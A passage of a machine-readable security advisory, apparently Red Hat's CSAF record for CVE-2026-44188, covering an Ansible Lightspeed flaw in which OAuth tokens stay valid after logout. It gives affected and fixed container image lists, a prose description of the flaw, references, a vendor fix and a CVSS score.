"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2466764"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Ansible Lightspeed. This vulnerability, related to insufficient session expiration, allows a remote attacker to maintain persistent access to the Ansible Lightspeed instance. If an attacker exfiltrates a valid OAuth (Open Authorization) access token before a user logs out, they can continue to authenticate and access sensitive data. This is because the application fails to invalidate the token on the backend, leaving it valid until its natural expiration. This can lead to unauthorized read access to Ansible resources such as inventories, playbooks, and configuration data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ansible-lightspeed: Ansible Lightspeed: Session hijacking and unauthorized data access due to insufficient session expiration",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate vulnerability in Ansible Lightspeed allows for post-logout session hijacking. An attacker who obtains a valid OAuth token before a user logs out can maintain persistent unauthorized access to Ansible Automation Platform resources, including inventories and playbooks, because the backend token is not invalidated upon client-side logout. This risk is primarily for data confidentiality, as current token scopes are read-only.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44188"
},
{
"category": "external",
"summary": "RHBZ#2466764",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466764"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44188",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44188"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44188",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44188"
}
],
"release_date": "2026-06-15T08:08:37.961000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-15T08:51:13+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25928"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
